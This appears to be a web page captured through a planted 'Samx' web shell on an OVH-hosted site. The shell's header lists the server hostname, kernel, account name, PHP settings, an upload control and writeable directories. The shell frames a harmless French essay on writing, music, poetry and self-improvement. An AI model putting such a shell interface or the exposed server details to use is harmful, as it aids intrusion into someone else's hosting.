Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/ecole/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/ecole/Audio/2018-01-10_Ecriture-et-Musique-full.txt
L'écriture, avec la conception de chansons, sont des moyens permettant à chacun d'évoluer. Aussi, l'écriture, c'est pour soi avant tout, contrairement à ce qui nous est enseigné en 2013. On regarde ce qu'on a écrit, il y a longtemps, pour se voir comme un autre. On a peur au début. Mais à force d'ateliers d'écriture, on a envie d'évoluer. On crée alors son propre réseau, en fonction de sa recherche de vérité, pour que sa vérité devienne celle des autres. On évolue par les autres, puis, par ses écrits.
La société du divertissement, qui donne des émotions, nous rend prisonniers de nos sens et nous enlève cette vision du futur, permettant d’anticiper. L’anticipation permet pourtant d’évoluer pour son bonheur et celui des autres.
Beaucoup agissent en fonction de pulsions. Nous méritons donc mieux que notre destruction. Nous méritons notre propre épanouissement. Développer l’autre, c’est se développer soi. On évolue plus vite en comprenant ceux qui réfléchissent différemment.
Par contre apprendre grâce à sa propre créativité engage l’élève à dépasser le maître. Créer c’est adapter son esprit à son environnement, pour adapter son environnement à soi. Non seulement on garde trace de soi, mais, en plus, on évolue vite. Sa création permet de s’auto-critiquer et d’évoluer plus facilement. L’élève devient alors très vite autonome.
La musique et la recherche de vérité
La poésie permet de comprendre ses sens. Si on écrit soi-même une poésie dans un atelier d’écriture, on aboutit directement à une vision de ses sens, que l’on trouve souvent édulcorée au début. Ayant compris ses sens, son esprit peut s’élever pour trouver son bonheur.
Lorsqu’on n’accepte pas certaines parties de musiques que l’on écoute, cela veut dire que l’on souhaiterait créer une autre musique. En ayant une connaissance de certains instruments, on peut alors élaborer une musique. Il est nécessaire, alors, de dépasser la volonté de copier, comme on nous l’enseigne.
Pour dépasser cette volonté de copier,  on écrit sur la musique, ou sa façon de comprendre la musique. On peut écrire cela en envoyant des messages, ou, mieux, en dialoguant scientifiquement avec ses amis. Sa propre perception du monde permet donc de voir comment on évolue. On crée alors avec sa réflexion. Un style naît.
Si l'on veut perfectionner sa façon d'écrire, il est possible d'utiliser des outils qui ont fait la gloire de certains écrivains. Par exemple, la machine à écrire permet d'anticiper pour écrire. En effet, il est difficile d'enlever les fautes d'orthographe sur cette machine. Ainsi, un enfant qui apprendra la machine à écrire avant l'ordinateur saura mieux maîtriser l'écriture. Il comprendra l'importance des mots et de la ponctuation, d'une présentation structurée et soignée. Il se fatiguera aussi beaucoup moins à écrire, voudra mieux comprendre l'origine des mots.
C’est son esprit qu’il faut prendre en compte, pas ses sens. On peut par exemple penser que la musique fonctionne comme sa façon de marcher, avec une volonté de plus en plus évidente d’avancer. Comme pour la poésie, on comprend, alors, mieux son écoute. On renforce son ego car l'esprit demandait des réponses à des manques. Si on ne connaît pas le solfège, un piano peut permettre de créer très facilement de la musique.
S’attacher à ce qui permet d’évoluer donne envie de se comprendre. Cela donne aussi envie de casser les barrières de l’émotivité, rendant peureux. À la fin évoluer sera un leitmotiv. On peut chercher la vérité avec une poésie, permettant de se comprendre soi. On trouve mieux qu’une compréhension de soi, c’est à dire une réflexion aboutie et optimiste sur soi.
Aussi la recherche de ses origines permet de trouver des écrits de cousins ayant une vie similaire à la nôtre. En l'associant à la réflexion de quelqu’un d’opposé, on se découvre sur une autre facette. On peut alors anticiper l'avenir plus facilement. Cette recherche permet de construire une société, ou une famille. Cela résout les problèmes liés à son éducation, pour améliorer ou sublimer l’optimisme et l’histoire de sa famille.
Wolfgang Mozart était un surdoué génial. Il avait compris, comme étant sa recherche de vérité, la musique qu'on lui avait apprise. Il est vite devenu passionné. Quiconque peut créer la passion en lui, avec sa recherche de vérité. Plus on attend, plus on perd la capacité à apprendre. On peut à tout moment s'intéresser à quelque chose d'inattendu, ou que l'on veut étudier depuis longtemps.
La musique, l’écriture galvanisée par la conception en société et la poésie, la recherche de la vérité et de ses origines, associés à son opposé, sont un ensemble de satisfactions voulues par l’esprit. Elles permettent de nous élever comme de véritables êtres humains, c’est à dire des êtres créatifs cherchant l’éternité de nos actions. Pourrez-vous ajouter une de vos œuvres dans l'éternité de votre civilisation ?

Mes notes
Écrire une poésie. Essayez d'en créer une ballade.
Si on veut, publier gratuitement son œuvre sur archive.org.

SAMX